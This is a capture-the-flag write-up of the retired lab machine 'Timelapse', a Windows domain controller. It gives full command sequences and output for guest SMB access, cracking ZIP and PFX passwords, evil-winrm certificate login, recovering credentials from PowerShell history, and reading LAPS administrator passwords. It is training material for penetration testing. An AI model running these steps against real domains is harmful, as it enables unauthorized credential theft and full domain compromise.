Jostif — Timelapse

~/writeups/Timelapse

Easy Windows LAPS

Easy Windows Active Directory SMB WinRM Retired

Timelapse

SMB guest access exposes a password-protected ZIP containing a PFX certificate. Cracking both gives a WinRM foothold as legacyy. PowerShell history reveals svc_deploy credentials — a member of LAPS_Readers — enabling direct Administrator password retrieval from Active Directory.

Windows Server 2019

Role

Domain Controller

10.129.227.113

User flag

297fd26a…

Root flag

6eafa24f…

Techniques

SMB · PFX · LAPS · WinRM

User Flag

297fd26a1fxxxxxxxxxxxxxxxxxxxxxx

Root Flag

6eafa24ffaxxxxxxxxxxxxxxxxxxxxxx

SMB guest

→

winrm_backup.zip

→

PFX crack

→

legacyy (WinRM)

→

PS History → svc_deploy

→

LAPS_Readers

→

Administrator

01Reconnaissance — Nmap

Full TCP scan with service detection. Port layout immediately signals a Domain Controller: Kerberos (88), LDAP (389/3268), SMB (445) — and crucially WinRM over SSL on port 5986 rather than the usual 5985.

nmap full scan

$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.227.113 PORT STATE SERVICE 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 389/tcp open ldap Active Directory LDAP (Domain: timelapse.htb) 445/tcp open microsoft-ds? 5986/tcp open ssl/wsmans? <-- WinRM over SSL | ssl-cert: Subject: commonName=dc01.timelapse.htb 9389/tcp open mc-nmf .NET Message Framing clock-skew: mean: 8h00m02s <-- sync if Kerberos auth needed

takeawayPort 5986 (WinRM/HTTPS) is open — certificate or credential-based login is possible. LAPS documentation in SMB confirms LAPS is deployed on this DC.

02SMB Enumeration — Guest Access

Test for null/guest SMB access. The Shares share is readable without credentials.

netexec smb

$ nxc smb 10.129.227.113 -u 'guest' -p '' --shares Share Permissions ADMIN$ (none) C$ (none) IPC$ READ Shares READ <-- interesting SYSVOL (none)

Browse the Shares share with smbclient. Two subdirectories:

Dev/ — contains winrm_backup.zip
HelpDesk/ — contains LAPS installer and documentation (breadcrumb toward privesc)

smbclient

$ smbclient //10.129.227.113/Shares smb: \> cd Dev smb: \Dev\> ls winrm_backup.zip A 2611 smb: \Dev\> get winrm_backup.zip smb: \> cd HelpDesk smb: \HelpDesk\> ls LAPS.x64.msi LAPS_Datasheet.docx LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx

LAPS noteLAPS stores randomised local admin passwords as the AD computer attribute ms-Mcs-AdmPwd. If we find a user with read permission on that attribute, we get the Administrator password.

03Cracking the ZIP — zip2john

The ZIP is password-protected. Extract the hash with zip2john and crack with rockyou.

zip2john + john

$ zip2john winrm_backup.zip > zip.hash ver 2.0 … winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk … $ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) Session completed.

The ZIP contains a single file: legacyy_dev_auth.pfx — a PKCS#12 certificate bundle. The filename leaks the username: legacyy.

unzip

$ unzip -P supremelegacy winrm_backup.zip inflating: legacyy_dev_auth.pfx

04Cracking the PFX — pfx2john

A PFX file can have its own independent password. Trying the ZIP password fails, so we crack it separately.

pfx2john + john

$ pfx2john legacyy_dev_auth.pfx > pfx.hash $ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2)]) thuglegacy (legacyy_dev_auth.pfx) Session completed.

Extract the certificate and private key from the PFX using OpenSSL:

openssl extract

# Extract certificate (public) $ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.crt -passin pass:thuglegacy # Extract private key (no passphrase on output) $ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out legacyy.key -passin pass:thuglegacy

05WinRM Access as legacyy — User Flag

Authenticate to WinRM on port 5986 (SSL) using the extracted certificate and key. The -S flag forces SSL mode.

evil-winrm — cert auth

$ evil-winrm -i 10.129.227.113 -c legacyy.crt -k legacyy.key -S Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents> *EWR* cat C:\Users\legacyy\Desktop\user.txt 297fd26a1fxxxxxxxxxxxxxxxxxxxxxx

Check group membership — TIMELAPSE\Development stands out:

whoami /groups

BUILTIN\Remote Management Users Enabled TIMELAPSE\Development Enabled Mandatory Label\Medium Plus Mandatory Level

06Privilege Escalation — PowerShell History

Always check the PSReadLine history file early. It logs every command run in previous PowerShell sessions and is a frequent source of credentials on Windows boxes.

PSReadLine history

*PS* type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl … get-aduser -filter * -properties * exit

credentials foundsvc_deploy : E3R$Q62^12p7PLlC%KWaxuaV — hardcoded in plaintext inside a PowerShell session history file.

net user /domain

Administrator babywyrm Guest krbtgt legacyy payl0ad sinfulz svc_deploy thecybergeek TRX

07Lateral Movement → svc_deploy + LAPS Read

Log in as svc_deploy and verify group membership. The LAPS_Readers group confirms this account can read the ms-Mcs-AdmPwd attribute from AD.

evil-winrm — svc_deploy

$ evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S *EWR* whoami /groups TIMELAPSE\LAPS_Readers Enabled *EWR* Get-ADComputer DC01 -Properties ms-Mcs-AdmPwd | Select ms-Mcs-AdmPwd ms-Mcs-AdmPwd X-uBePA%n!&2C6-hZw63v5I,

how LAPS worksLAPS automatically rotates the local Administrator password on domain-joined machines and stores it as ms-Mcs-AdmPwd on the computer object in AD. Members of LAPS_Readers can read it via a single Get-ADComputer call.

08Root Flag — Administrator via LAPS

Use the retrieved LAPS password to authenticate directly as the local Administrator over WinRM. The root flag is in the TRX user's desktop — a quirk of this box's setup.

evil-winrm — Administrator

$ evil-winrm -i 10.129.227.113 -u Administrator -p 'X-uBePA%n!&2C6-hZw63v5I,' -S *EWR* whoami timelapse\administrator *EWR* cat C:\Users\TRX\Desktop\root.txt 6eafa24ffaxxxxxxxxxxxxxxxxxxxxxx

TL;DRKey Lessons

01 — hash everythingZIP and PFX containers have independent passwords. Always run zip2john / pfx2john and try rockyou before moving on.

02 — check PS history immediatelyConsoleHost_history.txt under PSReadLine is one of the first things to check post-foothold on any Windows box. Credentials in session history are extremely common.

03 — LAPS_Readers = game overIf a compromised account is in LAPS_Readers, a single AD query retrieves the local Administrator password. Always enumerate group memberships and check LAPS exposure.

← all writeups next machine →